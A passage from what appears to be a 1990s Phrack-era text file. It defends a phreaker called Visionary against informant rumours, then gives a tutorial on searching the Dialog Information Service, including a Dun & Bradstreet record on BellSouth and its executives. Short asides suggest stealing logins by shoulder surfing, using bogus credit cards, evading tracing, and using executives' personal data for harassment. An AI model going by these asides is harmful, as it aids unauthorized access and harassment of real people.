didn't care what Visionary did. Also Visionary at times would bolshit someone into thinking he was a government narc to get a reaction. "You would be suprised as to the number of people who actually wanted to narc," was Visionary's statement. Over the years Visionary has been the target of many a accuation. Many of those who know Visionary, know he is no narc, and never has been. Visionary, feels that people have been to quick to judge him, and he asks to just keep an open mind. The rumors about him are bolshit, as a number of facts will show. The facts which are a lot more credible stand a lot stronger than the rumors. 1. Many people Visionary has associated with have not been busted. This statement may not mean a thing, but it's going to be ovious if he is a narc a lot of his friends would go down. Visionary talks to everybody, therefore you know that he will know some who have been busted. But the number are few, and when you talk to several who have known him, they will admit no Secret Service or FBI have shown up to get them. Logic to some may not dictate reality, but it makes sense and has proven to be true. Take a look at people like, Fourth Reich, Gandalf, Lord Sigath, Hellmaster, The Phlaw, Renegade and Weirdo. All the people have been around for a long time, and associated with Visionary. So ask yourself, why, if Visionary is a narc are they not busted? The answer is plane as day. There is one major thing that needs to be covered in this file. The event I am refering to happened during the sumer of 1990. It waa around the time of the 702 bridge. There was a guy going by the handle of Storm Shadow around. Storm Shadow lives in the New York area and Storm ShadowVisionary first knew Storm Shadow in late 1989. Some people that knew this guy would say he was a bolshit artist, who didn't come through. Storm Shadow had aproached several people he knew with a deal involving information providers. The deal was he worked for a private investigator. The type of work Storm Shadow clamed to be doing was nonhacker related cases. He clamed it was just people he needed to obtain records on various things such as, Social Security records, local usage dialing records, CBI and TRW records, LD records as well as other things. He made offers to a number of people like Visionary, Toxic Roadkill, Code of Honor, Nemesis, Joe Friday, Billy The Kid as well as others to work for him. When he tried to get Visionary involved, he didn't have a lot for it. Storm Shadow asked Visionary to find people to help him out. Visionary introduced Storm Shadow to a few people explaining what Storm Shadow's problem. At this point Visionary just left it up to the people. One thing that should be understood, is Visionary had no notion that Storm Shadow wasn't anything beyond what he said. Some of the people like Toxic Roadkill, Joe Friday and Code of Honor did do some work for Storm Shadow. This thing went on for a few months ooff and on from late 1990 into 1991. Recently certain things came to light regarding Storm Shadow. In the fall of 91, there were a few people busted in the New York area. Storm Shadow and a guy known as Renegade Hacker were among the people. It appears Storm Shadow is a witness for the government against some of the others busted. It's been thought by a couple, that Storm Shadow was gathering evidence against the people he tried to get working for him. This in itself didn't make Visionary look very good, as he introduced Storm Shadow to a number of people. You see once again, Visionary is going to get blamed wrongfully for something not in his control. Gentleman, after reading the accounts above you may understand Visinary's anger when someone calls him a narc. Rather by his own falt, or just the manor of things, Visinary has not been treated fairly by the HP communinity. It's not fair that people look at him differently. Just because he may not be like everyone else is no excuse. Recently, people have been spreading a lot of rumors without hearing Visionary's side. Recently, people will produce what they call evidence without allowing him to explain. A lot of statements, and information have been passed among people, that when you look at it means nothing. People say they've got Visionary on tape admitting he's a narc. Visionary has bolshited people before, and the plane fact is someone was taping him. People will bring up the fact Visionary has not been busted. Just because the guy hasn't been busted doesn't mean anything. Visionary is not always active, therefore isn't always at risk. Some people t will wonder why someone Visionary's age, 27 years old is in this stuff. Some of the most wellknown hackers are in their twentys, and some are even in the early thirtys. One major fact, that has been brought up about Visionary will be addressed now. Some people, with good reason, may want to know the reason behind this major fact regarding Visionary. One question, that has come up from time to time, is what does Visionary specialize in relation to hacking. Some wonder what Visionary does in the hack/phreak world. Gentleman remember Visionary is handicapped as well as visually impaired. Being blind kind of makes his resources kind of limited in reading files. He uses an Echo Speach Card with limited software. Not just any program will work with the speach card. The Echo takes text and speaks it OK to a point. But when reading stuff from a text file, the words are not spoken properly. Some symbols aren't pronounced therefore making things even harder. When on a Unix system it's rough because the commands aren't spoken like they should be. The main thing Visionary is good at is the social enginering aspect. Let's keep in mind no matter how someone goes about learning, it does make them any different different. Visionary should be looked upon as a shady character just because he may be curious. He has to learn by asking questions, where all of us take the ability of reading for granted. The reason this file is being widely spread, is in hopes some of the slandering of Visionary's name can stop. "The computer and the telephone are my best sources of entertainment. I enjoy hacking as a hoby and do not appreciate the continuing rumors people spread." fter The main thing here, is every time some strange event happens in the seen, people point the finger at Visionary. Let's stop the shit, let's stop assuming he's the guilty one. Recently Visionary was blamed for a bunch of people being on Alliance Teleconferencing. ==Phrack Magazine== Volume Four, Issue Forty-Four, File 18 of 27 **************************************************************************** Searching the Dialog Information Service By Al Capone (alcapone@mindvox.phantom.com) This file will show you how to use the Dialog Information Service. It is divided into the following parts: <> --- Background Information <> --- Accessing Dialog <> --- What to do when you're in <> --- Searching and Search Strategy As loyal Phrack readers may recall, there have been two articles written about Dialog already: Control-C wrote "Inside Dialog" in Issue 9 and much later Brian Oblivion wrote "The Complete Guide to The DIALOG Information Network" in Issue 39. Why another one? The online world changes so rapidly that things written just a couple of years ago can be out of date today. What differentiates this file from its two predecessors is that this file is: less 'manual derived', current (as of 11/93), more hands on, and hopefully is easier to read and put to immediate use. To obtain additional information about Dialog contact: Dialog Information Service Worldwide Headquarters 3460 Hillview Avenue P.O. Box 10010 Palo Alto, CA 94303-0993 Phone: 1-800-3-DIALOG (800-334-2564) <> Background Information ------------------------- "The United States is turning from an industrial age nation into an information age nation," U.S. Senator Gary Hart, The Tonight Show, 1993. From Big Brother creating dossiers on subversives to credit reporting agencies determining whether or not you get your credit card application approved, it all boils down to the more you know, the better you are able to succeed in society. Following through a hacker progression, huge databases have amassed providing online access to a seemingly infinite number of sources used for anything imaginable. Lawyers can access these databases to research such things as precedents for court cases. A graduate student trying to earn his or her masters degree can gain access to research a thesis, companies can get information on competitors, and so on. Databases are distributed into two categories: Research and Entertainment. Gaining prominence in the early 1980's, entertainment databases were comprised of the big two: The Source and Compuserve. Another prominent service, the Dow Jones News Retrieval Service was part research and part entertainment. A few other less significant databases also existed at this time. The Source was a subsidiary of the investment firm of Welsh, Carson, and Stowe. It provided some seven hundred and fifty features and services including electronic mail. Investment features included a discount brokerage firm, and a full range of stock, bond, and commodities information, with an option to search portfolios. It also allowed you to search other fellow users by location, account number, or interest. The Source was subsequently bought out by Compuserve and was shutdown on August 1, 1989. Compuserve is a division of H&R Block. It is the largest service worldwide offering some four hundred thousand subscribers a variety of news and financial information. It also offers access to Valueline and the Standard and Poor databases, which are online business references. It also has online games and a travelling service. The Dow Jones News/Retrieval is a part of the Wall Street Journal and provides online abstracts of printed papers published by Dow Jones and Co. It now includes profiles of over forty six hundred companies and has diversified to provide sports coverage. Today, most of you are aware of the myriad of other entertainment online services such as Genie, Prodigy, America OnLine (AOL), etc. All of these so called entertainment services have made attempts at offering various business and research services to their users. Its interesting to sit back and watch how each one tries to out-do the other. You will find that some databases are offered through some of these entertainment services as well as dialog and perhaps other commercial services. Be aware that the costs may differ substantially among them for the same exact database. If you are paying for access, be sure to shop around if the particular database is popular. If you travel to your local university library you will notice computer databases to which you can access such things as doctoral dissertations (get brownie points by telling your professor how interesting his/her thesis was), medical research (look up that newly acquired disease that your doctor mumbled that you now have), even national newspaper articles. This is just another source of information at your disposal (aside from books that is). Popping up more and more in libraries are "fee based research services". These are simply professional librarians who use research databases to retrieve the information you are too ignorant or stupid (or don't have enough time) to retrieve yourself. Fees range from their cost only (ie, online charges) to upwards of $100. per hour of their time spent PLUS any online charges. As you can probably deduce, it would be cost effective to use every possible free source of information before turning to online searchers. I recommend exhausting all the in-library databases before going online simply because the in-library databases are usually available on CD-ROM and you are not charged an hourly rate to use it. And don't forget about all those free Internet FTP sites, Gopher, WAIS, WWW, and even usenet! Most librarians are just starting to pay attention to and make use of the Internet. However once you have read this article you will be well versed on one of the major databases that is being used by these research services. If you run into an online database in your library, I suggest that you know what you are doing, as librarians are very skeptical due to the fact that you are using their money to do your searching. Running a research service seems to be a good idea. Not only does it provide a "legal" form of hacking to satisfy your thirst for information, there is definitely a substantial amount of money to be made. Entrepreneur magazine lists it as being in the top ten of prospective business opportunities. You are professionally known as an information broker, a degree in Library Studies (a traditional four year degree) helps, and if you don't decide to pursue the research angle, you could then become a librarian (how exciting). One of the research databases commonly used is the Dialog Information Service. Dialog is a subsidiary of Lockheed Missile and Space Corporation. It provides access to more than three hundred databases containing over one hundred million records. The significance of this service is that it joins all 300+ databases together, you can skip from one database to another simply by 'beginning' the database. In the past, the user would have to individually call each database and pay an exorbitant charge to use it. Dialog eliminates this and keeps all the databases together. Because of the vastness, all sources are summarized with keyword searches. Dialog has substantial signup charges ($295. last time I asked them) in addition to the fact that each individual database charges an hourly rate. Each rate varies according to things like the relative importance of the topic, cost to put the information online, and the main determining factor: what they think the users will pay. Some database providers seem to defy any logical reasoning as to how they determined the cost to access their information. Dialog can be accessed in about a dozen different ways. It is available through Westnet, Wangpac, Dunsnet, IBM Information Network, and TWX-TELEX. The following chart lists some other alternatives along with connection rates: Ways to Access Dialog with Connection Rates Table 1 +--------------------------------------------------------------------------+ | Service Rate per Hour (U.S.Dollars) | | ------- --------------------------- | | | | Dialnet Direct Dial (Palo | | Alto Dialnet Nodes).................................$ 4.00 | | | | Dialnet-In Watts (Direct 800#)........................$24.00 | | | | GEIS-Marknet *........................................$25.00 | | | | GNS (Global Network Services - | | BT Tymnet) **.......................................$12.00 | | | | Internet Gateway..(ANSnet)............................$ 4.20 | | | | Journal of Commerce (JOC and | | KRU Network) ***...................................$24.00 | | | | Sprintnet (Formerly Telenet)..........................$12.00 | | | | | +--------------------------------------------------------------------------+ * = Available for users in Australia, New Zealand, Hong Kong, Singapore, and the Philippines. ** = Available in Europe. *** = Available in the Far East and Asia. <> - Accessing Dialog --------------------- The following three scenarios will show you how to log in to Dialog to begin your searching. [] denunciates what you should type in: 1. - Accessing Dialog through the Internet via the telnet command: ------------------------------------------------------------------ $ Telnet dialog.com DIALOG INFORMATION SERVICES PLEASE LOGON: ?XXXXXXXX [Enter the Dialog Usernumber] ENTER PASSWORD: ?XXXXXXXX [Enter the Dialog Password] You're In! 2. - Accessing Dialog through Tymnet ------------------------------------ [a] please log in:[dialog] DIALOG: call connected DIALOG INFORMATION SERVICES PLEASE LOGON: ?XXXXXXXX [Enter the Dialog Usernumber] ENTER PASSWORD: ?XXXXXXXX [Enter the Dialog Password] You're In! 3. - Accessing Dialog through Sprintnet --------------------------------------- [Enter] [Enter] [Enter] TELENET 123 45K @ [41548] 415 48 connected DIALOG INFORMATION SERVICES PLEASE LOGON: ?XXXXXXXX [Enter the Dialog Usernumber] ENTER PASSWORD: ?XXXXXXXX [Enter the Dialog Password] You're In! Here let me say a few things about getting a correct logon/password combination. In order to familiarize yourself with the system, Dialog gives you a starter kit which includes your legit logon/password, along with some other perks like some free online time. This online time can be used the minute you get your starter kit. You may also illicitly obtain a correct logon/password combination using such an elaborate technique as looking over the shoulder of the person typing it in (shoulder surfing). Of course Dialog will immediately revoke the 'hacked' account the minute that the "scheme" is uncovered, but at least you will have by then done your research and quietly slipped away. Keep in mind that network nodes send port identifiers and if you are using a bogus credit card, then you might be in some hot water should they decide to track you down. It is assumed that if you intend to gain unauthorized access, you are somewhat versed in the various methods to negate the 'tracing' capability of the network(s). Dialog offers 6 'free' accounts to prospective and current subscribers. These are restricted accounts which provide access to their ONTAP training databases. There are two to three dozen databases which they scale down to include a fraction of the number of records and/or contain dated records from years ago. You search these databases the same way as the full-scale ones. The purpose is for you to verify your search strategy, and once you feel confident that your search strategy will pull up the info you want (not too many records yet not too little), you use your dialog account to access the same database at the going rate. This way, you don't lose lots of cash if you screw up, because you made all your mistakes using the free accounts. Since I use the free accounts on occasion, I don't think it would be a good idea to list them in this file. Suffice it to say that Dialog is happy to provide the phone number to you that has the pre-recorded userid and password combinations for the ONTAP accounts. Note that these passwords are changed every month, with new passwords being provided at the first of each month and that only one person may use each account at a time. Also note that Dialog occasionally offers a 'free file of the month' in which you use your normal Dialog account to do searches in the particular database. They usually allow you to rack up to $50 or sometimes an hour's worth of search charges -- I guess that is Dialog's definition of 'free'. The only charges you pay when you access any free files of the month are telecommunications charges (see Table 1 above). Once you leave the free file of the month, you will start to incur normal Dialog online time charges. <> What to do When You're In ---------------------------- Once you have gained access to Dialog the system will show you something like this: Welcome to DIALOG Dialog level 29.01.04B Logon file227 22may93 12:27:30 COPR. (c) DIALOG INFORMATION SERVICES, INC. ALL RIGHTS RESERVED. NO CLAIM TO ORIG. U.S. GOVT. WORKS. ***Equal Employment Opportunity (EEO) Data Available in CENDATA Menu 22.7 ***Preformatted Patent REPORTS are now available for File 28,351 New: CINCINATTI/KENTUCKY POST (PAPERS) (File 722) New: ST. PETERSBURG TIMES (File 735) New: WICHITA EAGLE (PAPERS) (File 723) >>> Enter BEGIN HOMEBASE for Dialog Announcements <<< >>> of new databases, price changes, etc. <<< >>> Announcements last updated 07may93 <<< SYSTEM: The "SYSTEM:" prompt directs you to pick a file. A file in this case is the number to a database. In the above welcome message you will notice that the St. Petersburg Times appears in File 735. This simply means that if I wanted to look up an article in the St. Pete Times, I would type in "b735" at the "SYSTEM:" prompt. The "b" stands for begin, as if you are beginning in that database. Like I said earlier, each database charges a different rate which typically depends on the 'importance' of the information. Therefore, it will probably charge more for biochemistry information than for newspaper articles. The following list shows costs for the some of the "A" databases in the Dialog system. HOMEBASE is the Dialog tutorial. It provides all sorts of help needed by the beginner hacker...errr user. Homebase lists announcements, dates and locations of training seminars ($70 to $140 for half/full day seminars, I have been to a few for dialog and some of their individual databases and highly recommend going especially if they are offered for free), and lists dialups in various area codes. Individual Dialog databases by the Letter A Table 2 +--------------------------------------------------------------------------+ | File Number | Database Name | Rate per Minute/Hour | |---------------|--------------------------------|-------------------------| | 15 | ABI/Inform | 2.20/132.00 | | 88 | Academic Index | 1.40/84.00 | | 108 | Aerospace Database | 1.50/90.00 | | 163 | AGELINE | 1.00/60.00 | | 581 | Agribusiness U.S.A. | 1.60/96.00 | | 10 | Agricola 1979-present | .75/45.00 | | 110 | Agricola 1970-1978 | .75/45.00 | | 203 | Agris International | 1.00/60.00 | | 306 | The Agrochemicals Handbook | 4.41/265.00 | | 157 | AIDSline 1980- | .60/36.00 | | 708 | Akron Reacon Journal | 1.60/96.00 | | 38 | America:History and Life | 1.08/65.00 | | 625 | America:Banker Full Text | 2.00/120.00 | | Banknews | American Banker News | 2.00/120.00 | | 460 | American Library Directory | 1.25/75.00 | | 236 |American Men and Women of Scien.| 1.58/95.00 | | 305 | Analytical Abstracts | 2.66/160.00 | | 257 | API Energy Business News | 1.60/96.00 | | 897 | API Energy Business News | 1.60/96.00 | | 354 | APILIT (non-subscriber) | 3.08/154.00 | | 954 | APILIT (Subscriber) | 1.83/110.00 | +--------------------------------------------------------------------------+ This list continues for some fifteen more databases (those that start with the letter A). If I were to list the entire database list, this covers some ten pages of documents, not withstanding that it's constantly being revised/updated. If you look at my example in logging on, the St. Petersburg Times was recently added as a database. This would not reflect in my database list as I have compiled, outdating it before I even listed it. I suggest that you contact Dialog at the phone/address at the beginning for an updated list of databases. The document is called "Price List". However Dialog has online an entire list of all its databases. This list is located in File 411. Also contained in this list is the Dun and Bradstreet databases (Files 514 through 522). Dun and Bradstreet provides corporate information to subscribers. It can be used for anything from competitive intelligence on another business to credit reports on prospective clients to background intelligence. File 519 contains full disclosure on financial information on a company. Each record costs $106. (at this time). The other databases are significantly cheaper, but not by much. The way D&B gathers this information is they send out employees to "interview" various corporations and their officers and simply translate the info into a record which they then market. One thing about each database is that they each contain their own language within the general Dialog language (which will be discussed further in this file). In Dun and Bradstreet you can search by company, PIC and SIC codes (these are simply manufacturing categories which the searcher can use to find companies. Example: if I wanted to find the top ten companies in long-distance services, I could use a PIC code), or various other categories. The following is an exploration of Phrack's old buddies, BellSouth: $ s dp=10-667-8006 $ t s2/co/all (The "dp" command displays all subsidiaries of a company (only the direct subsidiaries, the ones that report directly to BellSouth. The result is the following:) Company Name -------------------------------- Mobil Communications Corp Bellsouth DC Inc American Cellular Communications Bellsouth Enterprises Inc Bellsouth Financial Services Bellsouth Advertising & Publishing Mobile Communications Corporation Mobilecomm of Nashville, Inc. Bellsouth Telecommunications Here is the record disclosure from File 516: D&B Market Identifiers: 2655560 DIALOG File 516: D&B Duns Market Identifiers Bellsouth Corporation 1155 Peachtree St Ne Atlanta, GA 30367-6000 TELEPHONE: 404-249-2000 COUNTY: Fulton MSA: 0520 (Atlanta, GA) REGION: South Atlantic BUSINESS: Telecommunications Services PRIMARY SIC: 4813 Telephone communication, except radio 48130000 Telephone communication, except radio, nsk 48130102 Local telephone communications 48130103 Long distance telephone communications 48130104 Voice telephone communications SECONDARY SIC(S): 4812 Radiotelephone communication, nsk 48129901 Cellular telephone services 48129902 Paging services 2741 Miscellaneous publishing, nsk 27410304 Directories, telephone: publishing only, not printed on site 5065 Electronic parts and equipment, nec, nsk 50650100 Telephone and telegraphic equipment 50650103 Telephone equipment LATEST YEAR ORGANIZED: 1983 OWNER CHANGE DATE: NA STATE OF INCORPORATION: GA DATE OF INCORPORATION: 10/13/1983 ANNUAL SALES REVISION DATE: 04/19/1993 LATEST TREND BASE YEAR YEAR YEAR (1991) (1989) SALES $ 15,201,600,000 $ 14,445,500,000 $ 13,600,000,000 EMPLOYEES TOTAL: 97,100 96,975 102,000 EMPLOYEES HERE: 982 SALES GROWTH: 6 NET WORTH: $ 11,996,800,000 EMPLOYMENT GROWTH: -5 SQUARE FOOTAGE: 480,000 OWNED NUMBER OF ACCOUNTS: NA ACCOUNTING FIRM: Coopers & Lybrand Atlanta GA BANK: Chase Manhattan Bank NA Inc BANK DUNS: 00-698-1815 THIS IS: A HEADQUARTERS LOCATION AN ULTIMATE LOCATION A CORPORATION A PUBLIC COMPANY A MILLION DOLLAR DIRECTORY COMPANY DUNS NUMBER: 10-667-8006 CORPORATE FAMILY DUNS: 10-667-8006 CHAIRMAN: Clendenin, John L /Chb-Pres-Ceo PRESIDENT: Clendenin, John L /Chb-Pres-Ceo VICE PRESIDENT: O Neill, Robert W /Vp Assoc Gen Counsel Markey, David J /Vp-Govt Affairs Fiedler, Mark L /Vp-Corp Development Gunter, John R /V Pres-Corp Responsibility & C Casey, Patrick H /V Pres-Comptroller Yokley, Arlen G /V Pres-Sec-Treas SECRETARY: Yokley, Arlen G /V Pres-Sec-Treas TREASURER: Yokley, Arlen G /V Pres-Sec-Treas VICE-CHAIRMAN: Holding, Harvey R /V Chb-Finance & Administration McCoy, William O /V Chb COUNSEL: Alford, Walter H /Exec V Pres-Gen Counsel FINANCE: Holding, Harvey R /V Chb-Finance @ Administration RESEARCH AND DEVELOPMENT: Fiedler, Mark L /Vp-Corp Development EXECUTIVE VICE PRESIDENT: McGuire, Raymond L /Exec V Pres-Govt Affairs Alford, Walter H /Exec V Pres-Gen Counsel Mauldin, Earle /Exec Vp & Cfo SENIOR VICE PRESIDENT: Reddersen, William F /Sr Vp-Broadband Strategies CHIEF EXECUTIVE OFFICER: Clendenin, John L /Chb-Pres-Ceo ADMINISTRATION: Reddersen, William F /Sr Vp-Broadband Strategies McCoy, William O /V Chb McGuire, Raymond L /Exec V Pres-Govt Affairs Mauldin, Earle /Exec Vp & Cfo Holding, Harvey R /V Chb-Finance & Administration CHIEF FINANCIAL OFFICER: Mauldin, Earle /Exec Vp & Cfo MANAGEMENT: O Neill, Robert W /Vp Assoc Gen Counsel SALES-MARKETING VP: Gunter, John R /V Pres-Corp Responsibility & C FINANCE VP: Casey, Patrick H /V Pres-Comptroller ENGINEERING VP: Fiedler, Mark L /Vp-Corp Development Record 519 goes on and displays news and personal information on the executive officers, including the following: At divestiture, AT&T transferred to this corporation its 100 ownership in South Central Bell Telephone Company, Southern Bell Telephone and Telegraph Company and Bellsouth Mobility Inc. Shareholders of AT&T as of Dec 30 1983 received one share of Bellsouth stock for every 10 common shares of AT&T stock. Business started 1983. The common stock is listed on the New York, Boston, Midwest, Pacific and Philadelphia stock exchanges under the symbol "BLS". As of Jan 31 1993, there were 1,286,670 shareholders of record. The majority of the outstanding common stock is owned by the general public. Officers and directors own less than 1 of the outstanding stock. ............RECENT EVENTS......... In Jan 1992, the company and RAM Broadcasting Corporation formed a business venture to own and operate certain mobile data communications networks worldwide as well as certain cellular and paging operations in the US (Further details on file at the Woodbury, NY office of Dun & Bradstreet). During 1992, the company made several small acquisitions, principally related to cellular phone service. On Sep 20 1991, the company acquired several properties in Indiana, Wisconsin and Illinois from McCaw Cellular Communications, Inc in exchange for $361 million, including BellSouth's interest in Rochester, NY's non-wireline cellular provider. On Sep 17 1991, the company completed the acquisition of Graphic Scanning Corp for an adjusted total cash purchase price of $168 million. In addition, certain liabilities of Graphic Scanning amounting to approximately $142 million were assumed by BellSouth. On Mar 28 1991, the company acquired from GTE Mobilnet Incorporated two cellular partnerships in which it held minority interests, which resulted in BellSouth Enterprises, Inc gaining an additional 21 interest in the Atlanta-Athens Limited Partnership and an additional 42 interest in the Lexington, Kentucky MSA Limited partnership. ........MANAGEMENT BACKGROUND........ CLENDENIN born 1934 married. 1955 Northwestern University BS. 1955-1978 Illinois Bell Telephone Co, Chicago, IL. 1975 Vice President. 1978-1980 Pacific Northwest Telephone Co, Seattle, WA, Executive Vice President. 1980-1981 AT&T Vice President. 1981 Southern Bell Telephone. 1984-present Chairman of Board, President, and CEO, Bellsouth Corporation. MCCOY born 1933. Graduate of University of North Carolina, 1955 BS, BA and MIT and 1968 MS Management. 1955-1959 U S Marine Corps. 1959-present BellSouth Corporation; 1993 Vice Chairman, BellSouth Corporation. YOKLEY born 1937. Graduate of Catawba College, Salisbury, NC 1959. 1959 joined subject. MCGUIRE born 1933 married. Graduate of Mississippi College 1957 and University of Mississippi 1960. 1961-1965 law clerk of the U S Court of Appeals, 5th Circuit and trial attorney for tax division at the Department of Justice, Washington, DC and 1966 became Assistant U S Attorney, Northern District of Mississippi. 1967 joined Southern Bell Telephone and Telegraph Company (Inc), Atlanta, GA. Mar 1985 elected to present position. Explanation of Bellsouth search results: ---------------------------------------- WOW! All they made in sales was 15 billion dollars -- and they call hackers crooks. The data showing the news is helpful, and all the personal information could really be used for harassment purposes if necessary. Take a look at their credentials. A prospective employee could use this data to ass-kiss a little. Their college references clearly show why the E911 document created such a fiasco in the company.... <> - Searching and Search Strategy: Contrived and Free Text Searching --------------------------------------------------------------------- There are two different types of searching to find the topic you need: contrived and free text. After selecting the "file" or database number that you want, Dialog gives you a "?" as a prompt. At this point you can begin your searching. Contrived word searches should begin offline though. The database in question will send you a thesaurus (for a fee usually) which will tell you exactly what words correlate with your topic, so that you can go directly to the topic eliminating a lot of extra online time. Keep in mind that each database has a different thesaurus so unless this database you have chosen is going to be your primary database of use down the road, then you may want to just use free text searching. The only problem with free text searching is if your word is anywhere in an article it is counted and shown to you whether relevant or not. Imagine searching for the word "aircraft" in an aeronautical database or "student" in an educational database. The result could be apocalyptic as you would have to sort the data by its relevancy or irrelevancy. That is why you need to develop what is called a "search strategy". Although Dialog permits you to expand a too narrow search or condense a broad search, a perfect strategy will not require the use of these commands (I will discuss them later though). A perfect strategy is both effective, time efficient, and doesn't generate too many headaches. The only things I feel that a search strategy needs to be considered a good one is the correct use of the system's language (you need to know exactly what you are typing in and why, just as with any other language - Fortran, C, etc.) and a synonym dictionary. Occasionally my mind will go blank in searching through a database for a topic because once I have input the primary topic, I run out of ideas with which to draw correlations. That is why you need the dictionary. If I were searching with the word "student", I could use the word "pupil" and "scholar" as other points of venue to search with after I have looked up "student" in the dictionary. By using this technique, you are sort of using a modification of the contrived word search as the costly thesaurus does the same action as your two dollar synonym dictionary. Beginning Your Search: The SELECT Command ----------------------------------------- After completing the login procedure, began the database that you want to search, and viewed the welcome banner, etc. you will be shown the following message: Set Items Description --- ----- ----------- ? This question mark tells you to start your search. Functionally the Select command will search through the database looking for the terms that you have specified. The correct way to do this is as follows: ? S [term] ex. ? S COMPUTER Although very broad, the select command will search the entire database for the word "Computer" and will compile a total list. It will display it to you as the following: ? S COMPUTER S1 27263 COMPUTER After each search the S# will increment itself by one. What this does is ease in the resurrection of searching. If I ever wanted to use the word "Computer" again, all I would have to type in is: "S1" for an easy substitution. Especially when I am using CD-ROM, I like to use a very broad topic to begin my searching, and then I will narrow it down. The word "Computer" fits this description. Adding meaning to the SELECTion ------------------------------- Here I would like to talk a little about the words "and" and "or". These words are definitely the most important words to search with. Specifically they will narrow down your search because you are using one more word to help you find and article. ex. ? S COMPUTER AND CRIME or S S1 AND CRIME 27263 S1 356 CRIME S2 49 S1 AND CRIME Notice how "CRIME" had 356 articles that contained its word, however when combined with the word "Computer" only had 49! This makes it very easy to narrow your search down to specifics, but not all the way as I will further explain. Another command I would like to discuss is the "SS" command. This is an abbreviation of the Select command known as "Select Steps". What this does is break up a search into individual steps. ex. ? SS COMPUTER AND CRIME S4 27263 COMPUTER S5 356 CRIME S6 49 COMPUTER AND CRIME This is specifically used if I want to individualize a search and use the terms for other topics. Keep in mind that the assigning of these steps and the individual searches that it must conduct may result in slower processing times thereby running up your total online bill. When Dialog is asked to do a search, it retrieves the following in what is called fields: Title, Abstract, Descriptors, and Identifiers. The two most important fields are the descriptors and identifiers. When scanning a database that has come up with fifteen sources the easiest way to determine if these articles are worth keeping or tossing into the circular file is through the descriptors and identifiers. The "Descriptor" will in two words or less explain the entire article, which is why they are otherwise known as the controlled vocabulary terms. Identifiers, on the other hand, are the free language terms. These are the ones we can relate to on an easier plane. You can also search specifically for descriptors or identifiers as well as a lot more terms by the following commands. Ex. S COMPUTER AND CRIME/DE This will search for computer and will use crime as a descriptor. /ID works as well for identifiers. Other suffixes can be used as according to the following table: Index Listing - Part 1 Table 3 +--------------------------------------------------------------------------+ | Suffix | Field Name | Indexing | Examples | |--------|--------------------|------------------|-------------------------| | /AB | Abstract | Word | S COMPUTER AND CRIME/AB | | | | | | | /DE | Descriptor | Word and Phrase | S COMPUTER AND CRIME/DE | | | | | | | /ID | Identifier | Word and Phrase | S COMPUTER AND CRIME/ID | | | | | | | /TI | Title | Word | S COMPUTER AND CRIME/TI | +--------------------------------------------------------------------------+ Truncation ---------- Truncation permits you to search for different forms of a search term. On Dialog, the symbol is "?". For instance, if I wanted to search for a word and I didn't know its exact spelling, I would do the following: ex. [Searching for the word Capone or Capoan, but not quite sure] ? S CAPO? S1 122753 CAPO? This also can be used in several other ways. For instance, plurality, or maximum number of letters following a word. Example: ex. ? S CAPO?? This maximizes the word search at two letters past the "O". ex. ? S CAPONE? This finds the plurality in the word capone. ex. ? S CAP? ? This finds the letters between the two question marks. Proximity and Field Operators ----------------------------- Proximity operators specify the position of search terms in relation to each other within a record or field. If I wanted to search for the words "Legion" and wanted to make sure that the word "Doom" was within a certain area around it, I would use a proximity operator. For instance: ? S LEGION(3W)DOOM 932 LEGION 812 DOOM 27 LEGION(3W)DOOM In the above example Doom was searched within three words of Legion. You can use any number in place of the three. The good thing about this proximity operator is that it searches the second word from the first on both sides. Using the above example here is a picture of it: Doom <---- 3 words ----> Legion <---- 3 words ----> Doom A field operator allows two words to be within a field in any order. For example: ? S COMPUTER(F)CRIME/DE 14321 COMPUTER/DE 2720 CRIME/DE 95 COMPUTER(F)CRIME/DE This shows that in the descriptor section of a search, the words computer and crime show up ninety-five times together. They could be completely unrelated, although this is doubtful. The L operator is used exclusively for the descriptor section. This operator simply "links" the words together. A search term looks like this: ? S COMPUTER(L)CRIME The N operator is used similar to the W operator in that it searches for a proximity of one word from another. Here is an example of a search: ? S COMPUTER(5N)CRIME This searches for the words computer and crime within five words of each other. Another way the N is used is to search with words that are the same, for instance the words: air-to-air, or protein(N)protein. The below example when using the "N" operator shows in the text just why the file would be flagged by the search program. Notice the "protein/protein". ? S PROTEIN(N)PROTEIN ... surfaces presumably as a result of dynamic process of protein adsorption and desorption and protein / protein interaction. Sample Record ------------- In order for me to discuss critical points in a found record I first need to show the record itself. The following record was searched in the ERIC database (File number 1 - - $.50 per minute and $30.00 per hour). ----------------------------------------------------------------------------- EJ330267 JC504091 Invitation to a Hacker. Archer, Chalmers, Jr.; Archer, A. J. Finch Community, Junior and Technical College Journal, v56 n4 p26-28 Feb-Mar 1986 Available From: UMI Language: English Document Type: JOURNAL ARTICLE (080) Journal Announcement: CIKMAY86 Examines the susceptibility of computerized institutional records to security violations by "hackers," wishing to access the systems. Points to practices that encourage security abuses and risk confidentiality. Outlines procedures used by Northern Virginia Community College to protect its computer system. (LAL) Descriptors: Community Colleges; *Computer Oriented Programs; *Computers; Confidentiality; *Confidential Records; Two Year Colleges Identifiers: *Hackers; School Records ----------------------------------------------------------------------------- Let us examine this search more closely. EJ330267 : This is what is known as the Dialog Accession Number. All files contained in the Dialog system, no matter what database has an accession number. You can search for an article exactly by this. Use the index AN=. Example: S AN=EJ330267 | Will call up the above article. Invitation to a Hacker : This is the title, use /TI as the index for this. Archer, Chalmers, Jr. : This is the author, Use the index AU=. Example: S AU=ARCHER, CHALMERS, JR. Community, Junior ... : This is the location, the source of the publication. Use the index SO=. English : This is the language. Dialog lets you search for articles in different languages. Use the index LA=. CIJMAY86 : This is the Journal Announcement. You can use the index JA= And you know the Abstract, descriptors and identifiers. The following table shows all the indexes including the ones above for convenience. Index Listing - Part 2 Table 4 +--------------------------------------------------------------------------+ | Prefix | Field Name | Indexing | |--------|---------------------------------------------|-------------------| | AN = | DIALOG Accession Number | Phrase | | AU = | Author | Phrase | | BN = | International Standard Book Number (ISBN) | Phrase | | CD = | Conference Date | Phrase | | CL = | Conference Location | Word | | CS = | Corporate Source | Word | | CT = | Conference Title | Word | | CY = | Conference Year | Phrase | | DT = | Document Type | Phrase | | JA = | Journal Announcement | Phrase | | JN = | Journal Name | Phrase | | LA = | Language | Phrase | | PY = | Publication Year | Phrase | | SN = | International Standard Serial Number (ISSN)| Phrase | | SO = | Source Publication | Word | | SP = | Conference Sponsor | Word | | UD = | Update | Phrase | +--------------------------------------------------------------------------+ The TYPE Command ---------------- The TYPE command is used to display your search results. Once you "S" the topic, you can display it in eight different formats. Each format costs a different price and varies with each database. It is usually more to display a full record than abstracts though. The command is listed as follows: T (or TYPE) set/format/range of records ex. T 